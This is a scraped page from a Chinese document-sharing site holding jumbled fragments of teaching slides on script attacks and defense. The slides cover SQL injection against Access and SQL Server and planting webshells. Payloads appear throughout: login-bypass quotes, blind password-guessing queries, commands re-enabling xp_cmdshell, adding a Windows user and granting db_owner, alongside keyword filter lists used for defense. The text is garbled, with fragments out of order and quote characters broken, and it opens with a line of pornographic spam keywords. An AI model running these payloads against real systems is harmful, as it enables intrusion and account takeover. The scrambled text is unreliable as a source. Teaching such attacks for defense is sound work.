freepeople性欧美熟妇, 色戒完整版无删减158分钟hd, 无码精品国产vα在线观看DVD, 丰满少妇伦精品无码专区在线观看,艾栗栗与纹身男宾馆3p50分钟,国产AV片在线观看,黑人与美女高潮,18岁女RAPPERDISSSUBS,国产手机在机看影片

正文內(nèi)容

網(wǎng)絡(luò)腳本攻擊與防御ppt-wenkub

2022-12-23 11:50:14 本頁(yè)面
 

【正文】 交如下語(yǔ)句: sp_addextendedproc Xp_cmdshell,dllname=39。 EXEC sp_dropextendedproc 39。 EXEC sp_dropextendedproc 39。 EXEC sp_dropextendedproc 39。 EXEC sp_dropextendedproc 39。 EXEC sp_dropextendedproc 39。 EXEC sp_dropextendedproc 39。 EXEC sp_dropextendedproc 39。 原因: 因?yàn)? ASP文件的時(shí)候,以“ %”為開(kāi)頭,“ %”標(biāo)記為結(jié)尾的語(yǔ)句都會(huì)當(dāng)作 ASP語(yǔ)句執(zhí)行。CREATE TABLE tmp([ID] int IDENTITY (1,1) NOT NULL,[name] [nvarchar] (300) NOT NULL,[depth] [int] NOT NULL,[isfile] [nvarchar] (50) NULL)。通過(guò)它可以列出指定目錄下所有的子目錄和文件。 其次 ,處理方法與“ Web和數(shù)據(jù)庫(kù)在一臺(tái)服務(wù)器”情況相同。ipconfig all39。假如 web目錄為 D:\WEB,具體語(yǔ)句如下: 。并且使用 webshell一般不會(huì)在系統(tǒng)日志中留下記錄,只會(huì)在網(wǎng)站的 web日志中留下一些數(shù)據(jù)提交記錄,沒(méi)有經(jīng)驗(yàn)的管理員是很難看出入侵痕跡的。 2. 無(wú)法直接連接服務(wù)器 取得 webshell。 user helen 123456 /add39。db_owner39。)。)。|。cstr(request(id)) sql sql=select * from news where id=amp。 提交: and (select count(*) from sysobjects)0 ?如果是 Access數(shù)據(jù)庫(kù),因?yàn)椴淮嬖?sysobjects表,所以返回結(jié)果應(yīng)該和正常頁(yè)面有很大區(qū)別; ?如果是 SQLServer,則應(yīng)該返回一個(gè)查詢成功的正常頁(yè)面。39。 中。80040e1439。 ?這里我們就過(guò)濾掉其中的單引號(hào)“ 39。 and password=? 39。)。 password1 amp。 admin1 amp。第五章 腳本攻擊與防御 1 SQL注入技術(shù) ?什么是 SQL注入技術(shù)? SQL注入即是指攻擊者通過(guò)在應(yīng)用程序中預(yù)先定義好的查詢語(yǔ)句結(jié)尾加上額外的SQL語(yǔ)句元素,欺騙數(shù)據(jù)庫(kù)服務(wù)器執(zhí)行非授權(quán)的任意查詢。 39。39。 javascript:(1)/SCRIPT else session(admin)=rs(admin) session(password)=rs(password) session(aleave)=rs(aleave) end if set rs=nothing 一個(gè)經(jīng)典的 SQL注入漏洞 分析 ?在用戶名和密碼那里都填入 ‘ OR? ?=? , ? SQL語(yǔ)句被構(gòu)造成 select * from admin where admin=? 39。OR? 39?!?,即是把程序的頭兩行改為: admin1=replace(trim(request(admin)),39。 字符串的語(yǔ)法錯(cuò)誤 在查詢表達(dá)式 39。 / ,行 8 Eg: 如果是 SQLServer數(shù)據(jù)庫(kù),那么應(yīng)該返回: Microsoft OLE DB Provider for ODBC Drivers 錯(cuò)誤 39。 之前有未閉合的引號(hào)。 Access數(shù)據(jù)庫(kù)的注入 ?把 IE菜單 =工具 =Inter選項(xiàng) =高級(jí) =顯示友好 HTTP 錯(cuò)誤信息前面的勾去掉,這樣可以顯示出現(xiàn)的錯(cuò)誤信息。owen sql,conn,1,1 title=rsnews(title) if and then (數(shù)據(jù)庫(kù)出錯(cuò) ) else % ? ? and 1=2 sql=select * from news where id=37 and 1=2 ? and 1=1 ? and 0(select count(*) from admin) 猜測(cè)是否存在 admin表 ? and 1=(select count(*) from admin where len(pass)0) 猜測(cè)是否存在 pass字段 ? and 1=(select count(*) from admin where len(password)0) ? and (select asc(mid(password,1,1)) from admin)100 假設(shè) pssword字段中第一個(gè)記錄的第一位的 ASCII碼大于 100,如果假設(shè)正確則應(yīng)該返回正常頁(yè)面 猜測(cè) password字段是否存在 防止 SQL注入 (1) 在服務(wù)端正式處理之前對(duì)提交數(shù)據(jù)的合法性進(jìn)行檢查; (2) 封裝客戶端提交信息; (3) 替換或刪除敏感字符 /字符串; (4) 屏蔽出錯(cuò)信息。|and|(|)|exec|insert|select|delete|update|count|*|%|chr|mid|master|or|char|declare Tc_Inf = split(Tc_In,|) 39。/Script 39。/Script SQLServer數(shù)據(jù)庫(kù)的注入 ? 判斷帳號(hào)的權(quán)限 ?帳戶有三種不同的權(quán)限: Sa權(quán)限、 Db_owner權(quán)限、Public權(quán)限 ? 。)) 。 。 什么是 webshell? 所謂 webshell就是一個(gè) asp或 php木馬后門(mén),黑客在入侵了一個(gè)網(wǎng)站后,常常在將這些 asp或php木馬后門(mén)文件放置在網(wǎng)站服務(wù)器的 web目錄中,與正常的網(wǎng)頁(yè)文件混在一起。 如何利用 Sa權(quán)限取得 webshell? ? 可以利用對(duì) Access數(shù)據(jù)庫(kù)注入的方法,猜解管理員帳
點(diǎn)擊復(fù)制文檔內(nèi)容
教學(xué)課件相關(guān)推薦
文庫(kù)吧 www.dybbs8.com
備案圖片鄂ICP備17016276號(hào)-1